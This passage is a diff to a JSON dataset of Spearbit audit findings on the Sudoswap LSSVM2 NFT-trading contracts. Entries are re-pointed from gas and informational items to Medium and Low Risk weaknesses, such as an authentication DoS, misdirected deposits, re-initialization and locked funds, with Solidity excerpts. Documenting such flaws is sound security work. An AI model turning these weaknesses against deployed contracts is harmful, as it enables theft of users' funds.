authAllowedForToken to toggle settings and reclaim their authorized pairs in the protocol context. authAllowedForToken checks for different admin overrides including admin interfaces of NFT marketplaces Nifty, Foundation, Digitalax and ArtBlocks. However, the protocol sup- ports royalties from other marketplaces of Manifold, Rarible, SuperRare and Zora. Of those, Manifold does have getAdmins() interface which is not considered in authAllowedForToken. And it is not certain that the others don't.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairERC721.sol," + "Severity: Medium Risk" ] }, { - "title": "Not tightly packing struct variables consumes extra storage slots and gas", + "title": "Misdirected transfers to invalid pair variants or non-pair recipients may lead to loss/lock of NFTs/tokens", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Gas efficiency can be achieved by tightly packing structs. Struct variables are stored in 32 bytes each and so you can group smaller types to occupy less storage.", + "body": "Functions depositNFTs() and depositERC20() allow deposits of ERC 721 NFTs and ERC20 tokens after pair creation. While they check that the deposit recipient is a valid pair/variant for emitting an event, the deposit transfers happen prior to the check and without the same validation. With dual home tokens (see weird-erc20), the emit could be skipped when the \"other\" token is transferred. Also, the isPair() check in depositNFTs() does not specifically check if the pair variant is ERC721_ERC20 or ERC721_ETH. This allows accidentally misdirected deposits to invalid pair variants or non-pair recipients leading to loss/lock of NFTs/tokens.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Variables that are redeclared in each loop iteration can be declared once outside the loop", + "title": "authAllowedForToken() returns prematurely in certain scenarios causing an authentication DoS", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "price is redefined in each iteration of the loop and right after declaration is set to a new value. for (uint256 i; i < numNFTs; i++) { uint256 price; (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier()); ... }", + "body": "Tokens listed on Nifty or Foundation (therefore returning a valid niftyRegistry or foundationTrea- sury) where the proposedAuthAddress is not a valid Nifty sender or a valid Foundation Treasury admin will cause an authentication DoS if the token were also listed on Digitalax or ArtBlocks and the proposedAuthAddress had admin roles on those platforms. This happens because the return values of valid and isAdmin for isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) respectively are returned as-is instead of returning only if/when they are true but continuing the checks for authorization otherwise (if/when they are false) on Digitalax and ArtBlocks. toggleSettingsForCollection and reclaimPair (which utilize authAllowedForToken) would incorrectly fail for valid proposedAuthAddress in such scenarios. 21 return", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Caller of swapTokenForSpecificNFTs() must be able to receive ETH", + "title": "Partial fills don't recycle ETH", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _refundTokenToSender() sends ETH back to the caller. If this caller is a contract then it might not be able to receive ETH. If it can't receive ETH then the transaction will revert. function _refundTokenToSender(uint256 inputAmount) internal override { // Give excess ETH back to caller if (msg.value > inputAmount) { payable(msg.sender).safeTransferETH(msg.value - inputAmount); } }", + "body": "After several fixes are applied, the following code exists. If the sell can be filled completely then ETH is recycled, however when a partial fill is applied then ETH is not recycled. This might lead to a revert and would require doing the trade again. This costs extra gas and the trading conditions might be worse then. function swap(Order calldata swapOrder) external payable returns (uint256[] memory results) { ... // Go through each sell order ... if (pairSpotPrice == order.expectedSpotPrice) { // If the pair is an ETH pair and we opt into recycling ETH, add the output to our total accrued if (order.isETHSell && swapOrder.recycleETH) { ... ... order.pair.swapNFTsForToken(... , payable(address(this)), ... ); } // Otherwise, all tokens or ETH received from the sale go to the token recipient else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); } } // Otherwise we need to do some partial fill calculations first else { ... ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); // ETH not recycled } // Go through each buy order ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "order.doPropertyCheck could be replaced by the pair's propertyChecker()", + "title": "Wrong allowances can be abused by the owner", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The field+check for a separate order.doPropertyCheck in struct SellOrder is unnecessary be- cause this can already be checked via the pair's propertyChecker() without relying on the user to explicitly specify it in their order.", + "body": "The function call() allows transferring tokens and NFTs that have an allowance set to the pair. Normally, allowances should be given to the router, but they could be accidentally given to the pair. Although call() is protected by onlyOwner, the pair is created permissionless and so the owner could be anyone.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "_payProtocolFeeFromPair() could be replaced with _sendTokenOutput()", + "title": "Malicious router mitigation may break for deflationary tokens", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Both ERC20 and ETH versions of _payProtocolFeeFromPair() and _sendTokenOutput() are iden- tical in their parameters and logic.", + "body": "ERC20 _pullTokenInputAndPayProtocolFee() for routers has a mitigation for malicious routers by checking if the before-after token balance difference is equal to the transferred amount. This will break for any ERC20 pairs with fee-on-transfer deflationary tokens (see weird-erc20). Note that there has been a real-world exploit related to this with Balancer pool and STA deflationary tokens.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "False positive in test_getSellInfoWithoutFee() when delta == FixedPointMathLib.WAD due to wrong implementation", + "title": "Inconsistent royalty threshold checks allow some royalties to be equal to sale amount", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In test_getSellInfoWithoutFee, delta is not validated via validateDelta, which causes a false positive in the current test when delta == FixedPointMathLib.WAD. This can be tried with the following proof of concept // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import {FixedPointMathLib} from ,! \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/FixedPointMathLib.sol\"; contract test{ using FixedPointMathLib for uint256; constructor() { uint256 delta = FixedPointMathLib.WAD; uint256 invDelta = FixedPointMathLib.WAD.divWadDown(delta); uint outputValue = delta.divWadDown(FixedPointMathLib.WAD - invDelta); // revert } }", + "body": "Threshold checks on royalty amounts are implemented both in _getRoyaltyAndSpec() and its caller _calculateRoyalties(). While _calculateRoyalties() implements an inclusive check with require(saleAmount >= royaltyTotal, \"Royalty exceeds sale price\");, (allowing royalty to be equal to sale amount) the different checks in _getRoyaltyAndSpec() on the returned amounts or in the calculations on bps in _computeAmounts() exclude the saleAmount forcing royalty to be less than the saleAmount. However, only Known Origin and SuperRare are missing a similar threshold check in _getRoyaltyAndSpec(). This allows only the Known Origin and SuperRare royalties to be equal to the sale amount as enforced by the check in _calculateRoyalties().", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Checks-Effects-Interactions pattern not used in swapNFTsForToken()", + "title": "Numerical difference between getNFTQuoteForBuyOrderWithPartialFill() and _findMaxFill- ableAmtForBuy() may lead to precision errors", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "It is a defensive programming pattern to first take NFTs and then send the tokens (i.e. the Checks- Effects-Interactions pattern). function swapNFTsForToken(...) ... { ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... }", + "body": "There is a slight numerical instability between the partial fill calculation and the first client side cal- culation (i.e. getNFTQuoteForSellOrderWithPartialFill() / getNFTQuoteForBuyOrderWithPartialFill(), _- findMaxFillableAmtForBuy() ). This is because getNFTQuoteForSellOrderWithPartialFill() first assumes a buy of 1 item, updates spotPrice/delta, and then gets the next subsequent quote to buy the next item. Whereas _findMaxFillableAmtForBuy() assumes buying multiple items at one time. This can for e.g. Exponential- Curve.sol and XykCurve.sol lead to minor numerical precision errors. function getNFTQuoteForBuyOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, ...); ... } } function getNFTQuoteForSellOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getSellInfo(spotPrice, delta, 1, fee, ... ); ... } ... } function _findMaxFillableAmtForBuy(LSSVMPair pair, uint256 maxNumNFTs, uint256[] memory ,! maxCostPerNumNFTs, uint256 ... while (start <= end) { ... (...) = pair.bondingCurve().getBuyInfo(spotPrice, delta, (start + end)/2, feeMultiplier, ,! protocolFeeMultiplier); ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Two versions of withdrawERC721() and withdrawERC1155()", + "title": "Differences with Manifold version of RoyaltyEngine may cause unexpected behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "withdrawERC721() and withdrawERC1155() with slightly different implementations. This is more difficult to maintain.", + "body": "Sudoswap has forked RoyaltyEngine from Manifold; however there are some differences. The Manifold version of _getRoyaltyAndSpec() also queries getRecipients(), while the Sudoswap version doesn't. This means the Sudoswap will not spread the royalties over all recipients. function _getRoyaltyAndSpec(...) // Manifold ,! ,! ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... try IRoyaltySplitter(royaltyAddress).getRecipients() returns (Recipient[] memory splitRecipients) { ... } } } function _getRoyaltyAndSpec(...) // Sudoswap ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 ,! amount) { ... } ... } } The Manifold version of getRoyalty() has an extra try/catch compared to the Sudoswap version. This protects against reverts in the cached functions. Note: adding an extra try/catch requires the function _getRoyaltyAnd- Spec() to be external. function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Manifold ... try this._getRoyaltyAndSpec{gas: 100000}(tokenAddress, tokenId, value) returns ( ... ) .... } function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Sudoswap ... ... (...) = _getRoyaltyAndSpec(tokenAddress, tokenId, value); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Missing sanity/threshold checks may cause undesirable behavior and/or waste of gas", + "title": "Swaps with property-checked ERC1155 sell orders in VeryFastRouter will fail", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Numerical user inputs and external call returns that are subject to thresholds due to the contract's logic should be checked for sanity to avoid undesirable behavior or reverts in later logic and wasting unnecessary gas in the process.", + "body": "Any swap batch of transactions which has a property-checked sell order for ERC1155 will revert. Given that property checks are not supported on ERC1155 pairs (but only ERC721), swap sell orders for ERC1155 in VeryFastRouter will fail if order.doPropertyCheck is accidentally set because the logic thereafter assumes it is an ERC721 order.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Deviation from standard/uniform naming convention affects readability", + "title": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Following standard/uniform naming conventions are essential to make a codebase easy to read and understand.", + "body": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell because it uses > instead of >= in the check pairBalance > newPriceToSellToPair.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational LSSVMPairFactory.sol#L471, LSSVMRouter.sol#L128-L135," + "Severity: Low Risk" ] }, { - "title": "Function _getRoyaltyAndSpec() contains code duplication which affects maintainability", + "title": "Lack of support for per-token royalties may lead to incorrect royalty payments", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _getRoyaltyAndSpec() is rather long and contains code duplication. This makes it difficult to maintain. 45 function _getRoyaltyAndSpec(address tokenAddress, uint256 tokenId, uint256 value) ... if (spec <= NOT_CONFIGURED && spec > NONE) { try IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId) returns (...) { // Support Art Blocks override require(recipients_.length == bps.length); return (recipients_, _computeAmounts(value, bps), ARTBLOCKS, royaltyAddress, addToCache); } catch {} ... } else { // Spec exists, just execute the appropriate one ... ... if (spec == ARTBLOCKS) { // Art Blocks spec uint256[] memory bps; (recipients, bps) = IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId); require(recipients.length == bps.length); return (recipients, _computeAmounts(value, bps), spec, royaltyAddress, addToCache); } else ... }", + "body": "The protocol currently lacks complete support for per-token royalties, assumes that all NFTs in a pair have the same royalty and so considers the first assetId to determine royalties for all NFT token Ids in the pair. If not, the pair owner is expected to make a new pair for NFTs that have different royalties. A pair with NFTs that have different royalties will lead to incorrect royalty payments for the different NFTs.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "getSellInfo always adds 1 rather than rounding which leads to last item being sold at 0", + "title": "Missing additional safety for multicall may lead to lost ETH in future", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Based on the comment // We calculate how many items we can sell into the linear curve until the spot price reaches 0, rounding up. In cases where delta == spotPrice && numItems > 1, the last item would be sold at 0: delta = 100; spotPrice = 100; numItems = 2; uint256 totalPriceDecrease = delta * numItems = 200; Therefore succeeds at: if (spotPrice < totalPriceDecrease) Later calculated: uint256 numItemsTillZeroPrice = spotPrice / delta + 1; That would result in 2, while the division was an exact 1, therefore is not rounded up in case where spotPrice == delta but increased always by 1.", + "body": "If the function multicall() would be payable, then multiple delegated-to functions could use the same msg.value , which could result in losing ETH from the pair. A future upgrade of Solidity might change the default setting for function to payable. See Solidity issue#12539. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Natspec for robustSwapETHForSpecificNFTs() is slightly misleading", + "title": "Missing zero-address check may allow re-initialization of pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function robustSwapETHForSpecificNFTs() has this comment: * @dev We assume msg.value >= sum of values in maxCostPerPair This doesn't have to be the case. The transaction just reverts if msg.value isn't sufficient.", + "body": "address(0), \"Initialized\");. However, without a zero-address check on _owner, this can be true even later if the pair is initialized accidentally with address(0) instead of msg.sender. This is because __Ownable_init in OwnableWithTransferCallback does not disallow address(0) unlike transferOwnership. This is however not the case with the current implementation where LSSVMPair.initialize() is called from LSSVMPairFactory with msg.sender as argument for _owner. it Therefore, LSSVMPair.initialize() may be called multiple times.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Two copies of pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From() are present", + "title": "Trade pair owners are allowed to change asset recipient address when it has no impact", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Both contracts LSSVMRouter and VeryFastRouter contain the functions pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From(). This is more difficult to maintain as both copies have to stay in synch.", + "body": "Trade pair owners are allowed to change their asset recipient address using changeAssetRecipi- ent() while getAssetRecipient() always returns the pair address itself for Trade pairs as expected. Trade pair owners mistakenly assume that they can change their asset recipient address using changeAssetRe- cipient() because they are allowed to do so successfully, but may be surprised to see that it has no effect. They may expect assets at the new address but that will not be the case.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Not using error strings in require statements obfuscates monitoring", + "title": "NFT projects with custom settings and multiple royalty receivers will receive royalty only for first receiver", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "require statements should include meaningful error messages to help with monitoring the system.", + "body": "_calculateRoyalties() and its view equivalent only consider the first royalty receiver when custom settings are enabled. If non-ERC-2981 compliant NFT projects on Manifold/ArtBlocks or other platforms that support multiple royalty receivers come up with custom settings that pair owners subscribe to, then all the royalty will go to the first recipient. Other receivers will not receive any royalties.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "prices and balances in the curves may not be updated after calls to depositNFTs() and depositERC20()", + "title": "Missing non-zero checks allow event emission spamming", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions depositNFTs() and depositERC20() allow anyone to add NFTs and/or ERC20 to a pair but do not update the prices and balances in the curves. And if they were to do so, then the functions might be abused to update token prices with irrelevant tokens and NFTs. However, it is not clear if/how the prices and balances in the curves are updated to reflect this. The owner can't fully rely on emits.", + "body": "Functions depositNFTs() and depositERC20() are meant to allow deposits into the pair post- creation. However, they do not check if non-zero NFTs or tokens are being deposited. The event emission only checks if the pair recipient is valid. Given their permissionless nature, this allows anyone to grief the system with zero NFT/token deposits causing emission of events which may hinder indexing/monitoring systems.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Functions enableSettingsForPair() and disableSettingsForPair() can be simplified", + "title": "Missing sanity zero-address checks may lead to undesired behavior or lock of funds", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions enableSettingsForPair() and disableSettingsForPair() define a temporary vari- able pair. This could also be used earlier in the code to simplify the code. function enableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); LSSVMPair pair = LSSVMPair(pairAddress); ... } function disableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); ... LSSVMPair pair = LSSVMPair(pairAddress); ... }", + "body": "Certain logic requires zero-address checks to avoid undesired behavior or lock of funds. For exam- ple, in Splitter.sol#L34 users can permanently lock ETH by mistakenly using safeTransferETH with default/zero- address value.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Design asymmetry decreases code readability", + "title": "Legacy NFTs are not compatible with protocol pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _calculateBuyInfoAndUpdatePoolParams() performs a check on maxExpectedToken- Input inside its function. On the other hand, the comparable check for _calculateSellInfoAndUpdatePoolParams() is done outside of the function: function _swapNFTsForToken(...) ... { // LSSVMPairERC721.sol ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(...) require(outputAmount >= minExpectedTokenOutput, \"Out too few tokens\"); ... } The asymmetry in the design of these functions affects code readability and may confuse the reader.", + "body": "Pairs support ERC721 and ERC1155 NFTs. However, users of NFT marketplaces may also expect to find OG NFTs such as Cryptopunks, Etherrocks or Cryptokitties, which do not adhere to these ERC standards. For example, Cryptopunks have their own internal marketplace which allows users to trade their NFTs with other users. Given that Cryptopunks does not adhere to the ERC721 standard, it will always fail when the protocol attempts to trade them. Even with wrapped versions of these NFTs, people who aren't aware or have the original version won't be able to trade them in a pair.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Providing the same _nftID multiple times will increase numPairNFTsWithdrawn multiple times to potentially cause confusion", + "title": "Unnecessary payable specifier for functions may allow ETH to be sent and locked/lost", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "If one accidentally (or intentionally) supplies the same id == _nftID multiple times in the array ids[], then numPairNFTsWithdrawn is increased multiple times. Assuming this value is used via indexing for the user interface, this could be misleading.", + "body": "LSSVMPair.initialize() which do not expect to receive and process Ether have the payable specifier which allows interacting users to accidentally send them Ether which will get locked/lost. LSSVMRouter.robustSwapERC20ForSpecificNFTsAndNFTsToToken() Functions", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Dual interface NFTs may cause unexpected behavior if not considered in future", + "title": "Obsolete Splitter contract may lead to locked ETH/tokens", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Some NFTs support both the ERC721 and the ERC1155 standard. For example NFTs of the Sandbox project. Additionally, the internal layout of the parameters of cloneETHPair and cloneERC1155ETHPair are very similar: | cloneETHPair | cloneERC1155ETHPair | | --- | --- | | mstore(add(ptr, 0x3e), shl(0x60, factory)) | mstore(add(ptr, 0x3e), shl(0x60, factory)) | | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | | mstore(add(ptr, 0x66), shl(0x60, nft)) | mstore(add(ptr, 0x66), shl(0x60, nft)) | | mstore8(add(ptr, 0x7a), poolType) | mstore8(add(ptr, 0x7a), poolType) | | mstore(add(ptr, 0x7b), shl(0x60, propertyChecker)) | mstore(add(ptr, 0x7b), nftId) | In case there is a specific function that only works on ERC721, and that can be applied to ERC1155 pairs, in combination with an NFT that supports both standards, then an unexpected situation could occur. Currently, this is not the case, but that might occur in future iterations of the code.", + "body": "After a pair has be reclaimed via reclaimPair(), pairInfos[] will be emptied and getPrevFeeRe- cipientForPair() will return 0. The obsolete Splitter will however remain present, but any ETH or tokens that are sent to the contract can't be completely retrieved via withdrawETH() and withdrawTokens(). This is because getPrevFeeRecipientForPair() is 0 and the tokens would be send to address(0). It is unlikely though that ETH or tokens are sent to the Splitter contract as it is not used anymore. function withdrawETH(uint256 ethAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... payable(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter())).safeTransferETH(... ); ,! } function withdrawTokens(ERC20 token, uint256 tokenAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... token.safeTransfer(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter()), ... ); c } function getPrevFeeRecipientForPair(address pairAddress) public view returns (address) { return pairInfos[pairAddress].prevFeeRecipient; } function reclaimPair(address pairAddress) public { ... delete pairInfos[pairAddress]; ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Missing event emission in multicall", + "title": "Divisions in getBuyInfo() and getSellInfo() may be rounded down to 0", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Not emitting events on success/failure of calls within a multicall makes debugging failed multicalls difficult. There are several actions that should always emit events for transparency such as ownership change, transfer of ether/tokens etc. In the case of a multicall function, it is recommended to emit an event for succeeding (or failing) calls.", + "body": "In extreme cases (e.g. tokens with a few decimals, see this example), divisions in getBuyInfo() and getSellInfo() may be rounded down to 0. This means inputValueWithoutFee and/or outputValueWithoutFee may be 0. function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... } function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 outputValueWithoutFee = (numItems * tokenBalance) / (nftBalance + numItems); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuote- WithRoyalties() could be misleading", + "title": "Last NFT in an XykCurve cannot be sold", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() re- turn a protocolFee variable. There are also other fees like tradeFee and royaltyTotal that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why other fees are not included here.", + "body": "The function getBuyInfo() of XykCurve enforces numItems < nftBalance, which means the last NFT can never be sold. One potential solution as suggested by the Sudoswap team is to set delta (=nftBalance) one higher than the real amount of NFTs. This could cause problems in other parts of the code. For example, once only one NFT is left, if we try to use changeSpotPriceAndDelta(), getBuyNFTQuote(1) will error and thus the prices (tokenBalance) and delta (nftBalance) can't be changed anymore. If nftBalance is set to one higher, then it won't satisfy pair.nft().balanceOf(pairAddress) >= 1. 31 contract XykCurve ... { function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // If numItems is too large, we will get divide by zero error if (numItems >= nftBalance) { return (Error.INVALID_NUMITEMS, 0, 0, 0, 0, 0); } ... } } function changeSpotPriceAndDelta(...) ... { ... (,,, uint256 priceToBuyFromPair,) = pair.getBuyNFTQuote(1); ... if (... && pair.nft().balanceOf(pairAddress) >= 1) { pair.changeSpotPrice(newSpotPrice); pair.changeDelta(newDelta); return; } ... } function getBuyNFTQuote(uint256 numNFTs) ... { (error, ...) = bondingCurve().getBuyInfo(..., numNFTs, ...); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Two ways to query the assetRecipient could be confusing", + "title": "Allowing different ERC20 tokens in LSSVMRouter swaps will affect accounting and lead to unde- fined behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPair has two ways to query the assetRecipient. On via the getter assetRecip- ient() and one via getAssetRecipient(). Both give different results and generally getAssetRecipient() should be used. Having two ways could be confusing. address payable public assetRecipient; function getAssetRecipient() public view returns (address payable _assetRecipient) { ... // logic to determine _assetRecipient }", + "body": "As commented \"Note: All ERC20 swaps assume that a single ERC20 token is used for all the pairs involved. * Swapping using multiple tokens in the same transaction is possible, but the slippage checks * & the return values will be meaningless and may lead to undefined behavior.\" This assumption may be risky if users end up mistakenly using different ERC20 tokens in different swaps. Summing up their inputAmount and remainingValue will not be meaningful and lead to accounting errors and undefined behavior (as noted).", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Functions expecting NFT deposits can validate parameters for sanity and optimization", + "title": "Missing array length equality checks may lead to incorrect or undefined behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions expecting NFT deposits in their typical flows can validate parameters for sanity and opti- mization.", + "body": "Functions taking two array type parameters and not checking that their lengths are equal may lead to incorrect or undefined behavior when accidentally passing arrays of unequal lengths.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Functions expecting ETH deposits can check msg.value for sanity and optimization", + "title": "Owners may have funds locked if newOwner is EOA in transferOwnership()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions that expect ETH deposits in their typical flows can check for non-zero values of msg.value for sanity and optimization.", + "body": "In transferOwnership(), if newOwner has zero code.length (i.e. EOA), newOwner.isContract() will be false and therefore, if block will be ignored. As the function is payable, any msg.value from the call would get locked in the contract. Note: ERC20 pairs and StandardSettings don't have a method to recover ETH.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "LSSVMPairs can be simplified", + "title": "Use of transferFrom may lead to NFTs getting locked forever", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "At the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVM- Pair, which could store them as immutable. Then functions pairVariant() and _immutableParamsLength() can also be moved to LSSVMPair, which would simplify the code.", + "body": "ERC721 NFTs may get locked forever if the recipient is not aware of ERC721 for some reason. While safeTransferFrom() is used for ERC1155 NFTs (which has the _doSafeTransferAcceptanceCheck check on recipient and does not have an option to avoid this), transferFrom() is used for ERC721 NFTs presumably for gas savings and reentrancy concerns over its safeTransferFrom variant (which has the _checkOnERC721Received check on the recipient).", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Unused values in catch can be avoided for better readability", + "title": "Single-step ownership change introduces risks", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Employing a catch clause with higher verbosity may reduce readability. Solidity supports different kinds of catch blocks depending on the type of error. However, if the error data is of no interest, one can use a simple catch statement without error data.", + "body": "Single-step ownership transfers add the risk of setting an unwanted owner by accident (this includes address(0)) if the ownership transfer is not done with excessive care. The ownership control library Owned by Solmate implements a simple single-step ownership transfer without zero-address checks.", "labels": [ "Spearbit", 